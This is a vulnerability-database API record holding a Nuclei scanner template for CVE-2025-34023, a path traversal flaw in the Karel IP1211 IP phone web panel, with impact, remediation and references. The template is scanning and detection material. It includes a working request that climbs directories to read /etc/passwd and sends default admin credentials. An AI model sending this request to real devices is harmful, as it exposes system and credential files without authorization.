{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-34023/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-34023/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-34023/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-34023/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-34023/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-34023"},"sightings":{"href":"/api/v1/sightings/cve-2025-34023"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-34023.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2025-34023\n\ninfo:\n  name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.\n  impact: |\n    Attackers can read arbitrary files including sensitive configuration and credential files stored on the device through path traversal in the page parameter.\n  remediation: |\n    Update Karel IP Phone IP1211 firmware to the latest version that properly validates file paths, or restrict access to the cgiServer.exx endpoint.\n  reference:\n    - https://cxsecurity.com/issue/WLB-2020100038\n    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-34023\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-34023\n    epss-score: 0.01572\n    epss-percentile: 0.74336\n    cwe-id: CWE-22\n  metadata:\n    max-request: 1\n  tags: cve,cve2025,karel,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd\"\n\n    headers:\n      Authorization: Basic YWRtaW46YWRtaW4=\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e001450fd48e582e8d22f2ecc438c90efcd447b99b33d944af84f0c17cf1c21c022100e0a8103bb9ddf92c45f31a7d6f8c9f2f8303961328e7f3af87afd1ded573c10c:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-34023"}